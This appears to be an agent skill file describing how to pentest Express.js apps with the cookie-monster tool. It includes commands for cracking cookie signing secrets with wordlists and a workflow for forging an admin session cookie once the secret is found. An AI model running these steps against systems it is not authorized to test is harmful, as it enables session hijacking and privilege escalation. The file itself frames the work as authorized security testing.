Hacktricks-skills nodejs-express-cookie-pentest

Pentest NodeJS Express.js applications by testing and cracking cookie signatures. Use this skill whenever you need to test Express.js cookie secrets, sign/verify cookies, or perform cookie-based authentication bypass testing. Trigger this skill for any web application security testing involving Express.js sessions, cookie-monster tool usage, or cookie signature brute-forcing.

Install

Source: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/network-services-pentesting/pentesting-web/nodejs-express/SKILL.MD

NodeJS Express Cookie Pentesting

A skill for testing and cracking Express.js cookie signatures using the cookie-monster tool.

When to Use This Skill

Use this skill when:

  • Testing Express.js web applications for cookie signature vulnerabilities
  • Attempting to crack cookie secrets using wordlists
  • Signing new cookies with a known secret
  • Performing batch cookie testing across multiple cookies
  • Analyzing session cookies for security weaknesses

Prerequisites

  1. Install cookie-monster:

    pip install cookie-monster
    
  2. Have access to target cookies - Extract cookies from browser dev tools or HTTP responses

Cookie Signature Testing

Test a Single Cookie

When you have one cookie to test against a known or suspected secret:

cookie-monster -c <cookie_value> -s <secret_key> -n <cookie_name>

Example:

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

Parameters:

  • -c: The cookie value (base64 encoded)
  • -s: The secret key to test
  • -n: The cookie name (e.g., session, connect.sid)

Test with Custom Wordlist

Brute-force the cookie secret using a custom wordlist:

cookie-monster -c <cookie_value> -s <secret_key> -w <wordlist_path>

Example:

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

Common wordlists to try:

  • /usr/share/wordlists/rockyou.txt
  • /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
  • Custom wordlists based on target organization naming conventions

Batch Mode - Test Multiple Cookies

When you have multiple cookies to test, use batch mode:

cookie-monster -b -f cookies.json

cookies.json format:

[
  {
    "cookie": "eyJmb28iOiJiYXIifQ==",
    "secret": "LVMVxSNPdU_G8S3mkjlShUD78s4",
    "name": "session"
  },
  {
    "cookie": "another_cookie_value",
    "secret": "another_secret",
    "name": "connect.sid"
  }
]

Batch Mode with Custom Wordlist

Test multiple cookies against a wordlist:

cookie-monster -b -f cookies.json -w custom.lst

Create and Sign New Cookies

If you've discovered the secret key, you can forge new cookies:

cookie-monster -e -f new_cookie.json -k <secret_key>

new_cookie.json format:

{
  "name": "session",
  "data": {
    "user_id": 123,
    "role": "admin",
    "email": "attacker@example.com"
  }
}

Output: The tool will output a signed cookie you can use in your requests.

Workflow Guide

Step 1: Extract Cookies

  1. Open browser DevTools → Application → Cookies
  2. Copy the cookie value (the part after the =)
  3. Note the cookie name

Step 2: Initial Testing

Try common secrets first:

# Common Express.js defaults to try
cookie-monster -c <cookie> -s "secret" -n session
cookie-monster -c <cookie> -s "changeme" -n session
cookie-monster -c <cookie> -s "express" -n session

Step 3: Wordlist Attack

If common secrets fail, use a wordlist:

cookie-monster -c <cookie> -s <signature> -w /path/to/wordlist.txt -n session

Step 4: Forge New Cookie

Once you have the secret, create a new cookie with elevated privileges:

cookie-monster -e -f new_cookie.json -k <discovered_secret>

Common Express.js Cookie Names

  • session
  • connect.sid
  • express.sid
  • sess
  • JSESSIONID
  • PHPSESSID

Tips

  1. Check for weak secrets - Many apps use predictable secrets like secret, changeme, or company names
  2. Look for secrets in source code - Check GitHub, config files, environment variables
  3. Use multiple wordlists - Combine general wordlists with target-specific ones
  4. Test in batch - If you have multiple cookies, batch mode is more efficient
  5. Document findings - Keep track of which secrets work for which applications

Security Considerations

  • Only test applications you have authorization to pentest
  • Document all findings for the security team
  • Report cookie signature vulnerabilities as they can lead to session hijacking
  • Recommend using strong, randomly generated secrets in production

Integration with Other Tools

  • Burp Suite: Extract cookies from proxy history
  • Browser DevTools: Monitor cookie changes in real-time
  • curl: Test forged cookies in HTTP requests
  • Postman: Import forged cookies for API testing